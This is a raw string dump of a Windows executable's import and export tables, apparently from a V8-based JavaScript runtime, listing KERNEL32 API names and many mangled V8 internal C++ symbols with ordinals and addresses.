GetStartupInfoW, GetFileAttributesW, TerminateProcess, GetExitCodeProcess, CreateProcessW, UnregisterWaitEx, CreateJobObjectW, AssignProcessToJobObject, SetInformationJobObject, LCMapStringW, TryEnterCriticalSection, DeleteCriticalSection, RtlUnwind, WakeConditionVariable, WakeAllConditionVariable, SleepConditionVariableCS, ReleaseSemaphore, CreateSemaphoreW, GetCurrentThread, ResumeThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetNativeSystemInfo, CreateSemaphoreA, FlushFileBuffers, ReadFile, WriteFile, ConnectNamedPipe, SetNamedPipeHandleState, PeekNamedPipe, CreateNamedPipeW, WaitNamedPipeW, CancelSynchronousIo, CreateNamedPipeA, GetNamedPipeHandleStateA, GetLongPathNameW, GetShortPathNameW, ReadDirectoryChangesW, CreateDirectoryW, FindClose, FindFirstFileW, FindNextFileW, GetDiskFreeSpaceW, GetFileInformationByHandle, GetFileSizeEx, GetFinalPathNameByHandleW, GetFullPathNameW, RemoveDirectoryW, SetFilePointerEx, SetFileTime, DeviceIoControl, FlushViewOfFile, CreateFileMappingA, ReOpenFile, CopyFileW, MoveFileExW, CreateHardLinkW, GetFileInformationByHandleEx, CreateSymbolicLinkW, DebugBreak, FreeLibrary, LoadLibraryExW, SetErrorMode, GetQueuedCompletionStatus, ReadConsoleA, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, LoadLibraryW, GetModuleHandleW, GetSystemTime, SystemTimeToFileTime, FormatMessageW, SwitchToFiber, DeleteFiber, CreateFiber, ConvertFiberToThread, ConvertThreadToFiber, RtlVirtualUnwind, GetModuleHandleExW, AddVectoredExceptionHandler, RtlAddFunctionTable, RtlDeleteFunctionTable, VirtualProtect, IsDebuggerPresent, OutputDebugStringA, OpenThread, SuspendThread, GetThreadContext, GetLocaleInfoEx, GetNumberFormatEx, GetCurrencyFormatEx, ResolveLocaleName, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, GetTimeFormatEx, GetDateFormatEx, GetVersionExA, ExpandEnvironmentStringsA, GetWindowsDirectoryA, GetTickCount, GetACP, GetDynamicTimeZoneInformation, GetGeoInfoW, GetUserGeoID, CreateFileMappingW, LocaleNameToLCID, LCIDToLocaleName, ReleaseSRWLockExclusive, ReleaseSRWLockShared, AcquireSRWLockExclusive, AcquireSRWLockShared, TryAcquireSRWLockExclusive, TryAcquireSRWLockShared, DeleteFileA, GetFileSize, GetTempPathA, GetTempFileNameA, GetThreadTimes, VirtualAlloc, VirtualFree, SetThreadPriority, GetThreadPriority, QueryThreadCycleTime, SleepConditionVariableSRW, SetUnhandledExceptionFilter, InitializeSRWLock, InitializeCriticalSectionEx, InitOnceBeginInitialize, InitOnceComplete, EncodePointer, DecodePointer, LCMapStringEx, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree
                                                                                                                                                                                                        WINMM.dlltimeGetTime
                                                                                                                                                                                                        NameOrdinalAddress
                                                                                                                                                                                                        ??$Add@VIsolate@internal@v8@@@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z10x1407e6ea0
                                                                                                                                                                                                        ??$Add@VIsolate@internal@v8@@@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z20x1407e7060
                                                                                                                                                                                                        ??$Add@VIsolate@internal@v8@@@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z30x1407e71b0
                                                                                                                                                                                                        ??$Add@VIsolate@internal@v8@@@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z40x1407e73b0
                                                                                                                                                                                                        ??$Add@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedNameDictionary@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@@Z50x1407e0350
                                                                                                                                                                                                        ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z60x1407e7570
                                                                                                                                                                                                        ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z70x1407e7730
                                                                                                                                                                                                        ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z80x1407e7870
                                                                                                                                                                                                        ??$Add@VLocalIsolate@internal@v8@@@?$Dictionary@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@IV?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@PEAVInternalIndex@12@@Z90x1407e7a00
                                                                                                                                                                                                        ??$Add@VLocalIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V?$Handle@VOrderedNameDictionary@internal@v8@@@12@V?$Handle@VName@internal@v8@@@12@V?$Handle@VObject@internal@v8@@@12@VPropertyDetails@12@@Z100x1407e0620
                                                                                                                                                                                                        ??$Allocate@VIsolate@internal@v8@@@AstConsString@internal@v8@@AEBA?AV?$Handle@VString@internal@v8@@@12@PEAVIsolate@12@@Z110x140aff650
                                                                                                                                                                                                        ??$Allocate@VIsolate@internal@v8@@@DescriptorArray@internal@v8@@SA?AV?$Handle@VDescriptorArray@internal@v8@@@12@PEAVIsolate@12@HHW4AllocationType@12@@Z120x1407e7be0
                                                                                                                                                                                                        ??$Allocate@VIsolate@internal@v8@@@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@@Z130x1407e0be0
                                                                                                                                                                                                        ??$Allocate@VIsolate@internal@v8@@@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@@Z140x1407e0c00
                                                                                                                                                                                                        ??$Allocate@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@@Z150x1407e0c20
                                                                                                                                                                                                        ??$Allocate@VLocalIsolate@internal@v8@@@AstConsString@internal@v8@@AEBA?AV?$Handle@VString@internal@v8@@@12@PEAVLocalIsolate@12@@Z160x140aff700
                                                                                                                                                                                                        ??$Allocate@VLocalIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@SA?AV?$MaybeHandle@VOrderedNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@HW4AllocationType@12@@Z170x1407e0c50
                                                                                                                                                                                                        ??$AllocateFlat@VIsolate@internal@v8@@@AstConsString@internal@v8@@QEBA?AV?$Handle@VString@internal@v8@@@12@PEAVIsolate@12@@Z180x140aff7b0
                                                                                                                                                                                                        ??$AllocateFlat@VLocalIsolate@internal@v8@@@AstConsString@internal@v8@@QEBA?AV?$Handle@VString@internal@v8@@@12@PEAVLocalIsolate@12@@Z190x140aff9b0
                                                                                                                                                                                                        ??$AllocatePage@$00VSemiSpace@internal@v8@@@MemoryAllocator@internal@v8@@QEAAPEAVPage@12@_KPEAVSemiSpace@12@W4Executability@12@@Z200x140973ce0
                                                                                                                                                                                                        ??$AllocatePage@$0A@VPagedSpace@internal@v8@@@MemoryAllocator@internal@v8@@QEAAPEAVPage@12@_KPEAVPagedSpace@12@W4Executability@12@@Z210x140973d50
                                                                                                                                                                                                        ??$AllocatePage@$0A@VSemiSpace@internal@v8@@@MemoryAllocator@internal@v8@@QEAAPEAVPage@12@_KPEAVSemiSpace@12@W4Executability@12@@Z220x140973d90
                                                                                                                                                                                                        ??$AllocateScopeInfos@VIsolate@internal@v8@@@DeclarationScope@internal@v8@@SAXPEAVParseInfo@12@PEAVIsolate@12@@Z230x140af0bd0
                                                                                                                                                                                                        ??$AllocateScopeInfos@VLocalIsolate@internal@v8@@@DeclarationScope@internal@v8@@SAXPEAVParseInfo@12@PEAVLocalIsolate@12@@Z240x140af0c80
                                                                                                                                                                                                        ??$AllocateScopeInfosRecursively@VIsolate@internal@v8@@@Scope@internal@v8@@AEAAXPEAVIsolate@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z250x140af0d30
                                                                                                                                                                                                        ??$AllocateScopeInfosRecursively@VLocalIsolate@internal@v8@@@Scope@internal@v8@@AEAAXPEAVLocalIsolate@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z260x140af0dc0
                                                                                                                                                                                                        ??$AllocateSlotSet@$00@MemoryChunk@internal@v8@@QEAAPEAVSlotSet@12@XZ270x140972d00
                                                                                                                                                                                                        ??$AllocateSlotSet@$0A@@MemoryChunk@internal@v8@@QEAAPEAVSlotSet@12@XZ280x140972d10
                                                                                                                                                                                                        ??$At@VIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEBA?AV?$MaybeHandle@VObject@internal@v8@@@23@_KPEAVIsolate@23@@Z290x1408f40c0
                                                                                                                                                                                                        ??$At@VLocalIsolate@internal@v8@@@ConstantArrayBuilder@interpreter@internal@v8@@QEBA?AV?$MaybeHandle@VObject@internal@v8@@@23@_KPEAVLocalIsolate@23@@Z300x1408f4180
                                                                                                                                                                                                        ??$BigIntLiteral@VIsolate@internal@v8@@@internal@v8@@YA?AV?$MaybeHandle@VBigInt@internal@v8@@@01@PEAVIsolate@01@PEBD@Z310x1408cb990
                                                                                                                                                                                                        ??$BigIntLiteral@VLocalIsolate@internal@v8@@@internal@v8@@YA?AV?$MaybeHandle@VBigInt@internal@v8@@@01@PEAVLocalIsolate@01@PEBD@Z320x1408cbc20
                                                                                                                                                                                                        ??$BuildValue@VIsolate@internal@v8@@@Literal@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@12@PEAVIsolate@12@@Z330x140afcb10
                                                                                                                                                                                                        ??$BuildValue@VLocalIsolate@internal@v8@@@Literal@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@12@PEAVLocalIsolate@12@@Z340x140afcd40
                                                                                                                                                                                                        ??$ConvertDouble@H@internal@v8@@YAHN@Z350x140b03fc0
                                                                                                                                                                                                        ??$ConvertDouble@I@internal@v8@@YAIN@Z360x140b03fc0
                                                                                                                                                                                                        ??$ConvertDouble@M@internal@v8@@YAMN@Z370x140544a10
                                                                                                                                                                                                        ??$ConvertDouble@N@internal@v8@@YANN@Z380x140078990
                                                                                                                                                                                                        ??$ConvertDouble@_J@internal@v8@@YA_JN@Z390x140b03fd0
                                                                                                                                                                                                        ??$ConvertDouble@_K@internal@v8@@YA_KN@Z400x140b03fd0
                                                                                                                                                                                                        ??$ConvertDouble@_N@internal@v8@@YA_NN@Z410x140b03fe0
                                                                                                                                                                                                        ??$Create@VIsolate@internal@v8@@@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@12@PEAVIsolate@12@PEAVZone@12@PEAVScope@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z420x1407d8ff0
                                                                                                                                                                                                        ??$Create@VLocalIsolate@internal@v8@@@ScopeInfo@internal@v8@@SA?AV?$Handle@VScopeInfo@internal@v8@@@12@PEAVLocalIsolate@12@PEAVZone@12@PEAVScope@12@V?$MaybeHandle@VScopeInfo@internal@v8@@@12@@Z430x1407d9b00
                                                                                                                                                                                                        ??$CreateScript@VIsolate@internal@v8@@@ParseInfo@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VString@internal@v8@@@12@V?$MaybeHandle@VFixedArray@internal@v8@@@12@VScriptOriginOptions@2@W4NativesFlag@12@@Z440x1407b1e30
                                                                                                                                                                                                        ??$CreateScript@VLocalIsolate@internal@v8@@@ParseInfo@internal@v8@@QEAA?AV?$Handle@VScript@internal@v8@@@12@PEAVLocalIsolate@12@V?$Handle@VString@internal@v8@@@12@V?$MaybeHandle@VFixedArray@internal@v8@@@12@VScriptOriginOptions@2@W4NativesFlag@12@@Z450x1407b1fe0
                                                                                                                                                                                                        ??$Decode@E@Utf8Decoder@internal@v8@@QEAAXPEAEAEBV?$Vector@$$CBE@base@2@@Z460x1406bcb40
                                                                                                                                                                                                        ??$Decode@G@Utf8Decoder@internal@v8@@QEAAXPEAGAEBV?$Vector@$$CBE@base@2@@Z470x1406bcc80
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z480x1407e8de0
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z490x1407e8f40
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z500x1407e90a0
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z510x1407e9200
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z520x1407e9360
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z530x1407e94c0
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z540x1407e9620
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z550x1407e9780
                                                                                                                                                                                                        ??$EnsureCapacity@VIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVIsolate@12@V312@HW4AllocationType@12@@Z560x1407e98e0
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z570x1407e9a40
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z580x1407e9ba0
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z590x1407e9d00
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z600x1407e9e60
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z610x1407e9fc0
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z620x1407ea120
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z630x1407ea280
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VSimpleNumberDictionary@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z640x1407ea3e0
                                                                                                                                                                                                        ??$EnsureCapacity@VLocalIsolate@internal@v8@@@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VStringSet@internal@v8@@@12@PEAVLocalIsolate@12@V312@HW4AllocationType@12@@Z650x1407ea540
                                                                                                                                                                                                        ??$EnsureGrowable@VIsolate@internal@v8@@@?$OrderedHashTable@VOrderedHashMap@internal@v8@@$01@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedHashMap@internal@v8@@@12@@Z660x1407e0d60
                                                                                                                                                                                                        ??$EnsureGrowable@VIsolate@internal@v8@@@?$OrderedHashTable@VOrderedHashSet@internal@v8@@$00@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@12@PEAVIsolate@12@V?$Handle@VOrderedHashSet@internal@v8@@@12@@Z670x1407e0dd0
                                                                                                                                                                                                        ??$FindEntry@VIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@QEAA?AVInternalIndex@12@PEAVIsolate@12@VObject@12@@Z680x1407e0e40
                                                                                                                                                                                                        ??$FindEntry@VLocalIsolate@internal@v8@@@OrderedNameDictionary@internal@v8@@QEAA?AVInternalIndex@12@PEAVLocalIsolate@12@VObject@12@@Z690x1407e0e40
                                                                                                                                                                                                        ??$Free@$00@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z700x140973f20
                                                                                                                                                                                                        ??$Free@$01@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z710x140973f50
                                                                                                                                                                                                        ??$Free@$02@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z720x140973fc0
                                                                                                                                                                                                        ??$Free@$0A@@MemoryAllocator@internal@v8@@QEAAXPEAVMemoryChunk@12@@Z730x140974030
                                                                                                                                                                                                        ??$GetBoilerplateValue@VIsolate@internal@v8@@@MaterializedLiteral@internal@v8@@IEAA?AV?$Handle@VObject@internal@v8@@@12@PEAVExpression@12@PEAVIsolate@12@@Z740x140afd000
                                                                                                                                                                                                        ??$GetBoilerplateValue@VLocalIsolate@internal@v8@@@MaterializedLiteral@internal@v8@@IEAA?AV?$Handle@VObject@internal@v8@@@12@PEAVExpression@12@PEAVLocalIsolate@12@@Z750x140afd0a0
                                                                                                                                                                                                        ??$GetConstantForIndexOperand@VIsolate@internal@v8@@@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AV?$Handle@VObject@internal@v8@@@23@HPEAVIsolate@23@@Z760x140913450
                                                                                                                                                                                                        ??$InitFromFunctionLiteral@VIsolate@internal@v8@@@SharedFunctionInfo@internal@v8@@SAXPEAVIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@PEAVFunctionLiteral@12@_N@Z770x1407d60d0
                                                                                                                                                                                                        ??$InitFromFunctionLiteral@VLocalIsolate@internal@v8@@@SharedFunctionInfo@internal@v8@@SAXPEAVLocalIsolate@12@V?$Handle@VSharedFunctionInfo@internal@v8@@@12@PEAVFunctionLiteral@12@_N@Z780x1407d6500
                                                                                                                                                                                                        ??$InitLineEnds@VIsolate@internal@v8@@@Script@internal@v8@@SAXPEAVIsolate@12@V?$Handle@VScript@internal@v8@@@12@@Z790x1407ea9f0
                                                                                                                                                                                                        ??$InitLineEnds@VLocalIsolate@internal@v8@@@Script@internal@v8@@SAXPEAVLocalIsolate@12@V?$Handle@VScript@internal@v8@@@12@@Z800x1407eab10
                                                                                                                                                                                                        ??$Initialize@VIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVIsolate@12@VByteArray@12@H@Z810x1407bfb90
                                                                                                                                                                                                        ??$Initialize@VLocalIsolate@internal@v8@@@SwissNameDictionary@internal@v8@@QEAAXPEAVLocalIsolate@12@VByteArray@12@H@Z820x1407bfce0
                                                                                                                                                                                                        ??$Internalize@VIsolate@internal@v8@@@AstRawString@internal@v8@@QEAAXPEAVIsolate@12@@Z830x140affbb0
                                                                                                                                                                                                        ??$Internalize@VIsolate@internal@v8@@@AstValueFactory@internal@v8@@QEAAXPEAVIsolate@12@@Z840x140affc70
                                                                                                                                                                                                        ??$Internalize@VLocalIsolate@internal@v8@@@AstRawString@internal@v8@@QEAAXPEAVLocalIsolate@12@@Z850x140affda0
                                                                                                                                                                                                        ??$Internalize@VLocalIsolate@internal@v8@@@AstValueFactory@internal@v8@@QEAAXPEAVLocalIsolate@12@@Z860x140affe60
                                                                                                                                                                                                        ??$InternalizeStringWithKey@V?$SeqSubStringKey@VSeqOneByteString@internal@v8@@@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SeqSubStringKey@VSeqOneByteString@internal@v8@@@12@@Z870x1409dfe40
                                                                                                                                                                                                        ??$InternalizeStringWithKey@V?$SeqSubStringKey@VSeqTwoByteString@internal@v8@@@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SeqSubStringKey@VSeqTwoByteString@internal@v8@@@12@@Z880x1409dfe70
                                                                                                                                                                                                        ??$InternalizeStringWithKey@V?$SequentialStringKey@E@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@E@12@@Z890x1409dfea0
                                                                                                                                                                                                        ??$InternalizeStringWithKey@V?$SequentialStringKey@E@internal@v8@@@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@E@12@@Z900x1409dfed0
                                                                                                                                                                                                        ??$InternalizeStringWithKey@V?$SequentialStringKey@G@internal@v8@@@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@G@12@@Z910x1409dff00
                                                                                                                                                                                                        ??$InternalizeStringWithKey@V?$SequentialStringKey@G@internal@v8@@@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@12@PEAV?$SequentialStringKey@G@12@@Z920x1409dff30
                                                                                                                                                                                                        ??$MakeCheckOpString@HH@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@HHPEBD@Z930x140e5c840
                                                                                                                                                                                                        ??$MakeCheckOpString@II@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IIPEBD@Z940x140e5cb20
                                                                                                                                                                                                        ??$MakeCheckOpString@JJ@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@JJPEBD@Z950x140e5ce00
                                                                                                                                                                                                        ??$MakeCheckOpString@KK@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@KKPEBD@Z960x140e5d0e0
                                                                                                                                                                                                        ??$MakeCheckOpString@PEBXPEBX@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PEBX0PEBD@Z970x140e5d3c0
                                                                                                                                                                                                        ??$MakeCheckOpString@_J_J@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_J0PEBD@Z980x140e5d6a0
                                                                                                                                                                                                        ??$MakeCheckOpString@_K_K@base@v8@@YAPEAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@_K0PEBD@Z990x140e5d990
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1000x1407eaca0
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1010x1407eacf0
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VCompilationCacheTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1020x1407ead40
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VEphemeronHashTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1030x1407eae00
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1040x1407eaec0
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1050x1407eaf80
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNumberDictionary@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1060x1407eb040
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1070x1407eb100
                                                                                                                                                                                                        ??$New@VIsolate@internal@v8@@@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VObjectHashTable@internal@v8@@@12@PEAVIsolate@12@HW4AllocationType@12@W4MinimumCapacity@12@@Z1080x1407eb1c0
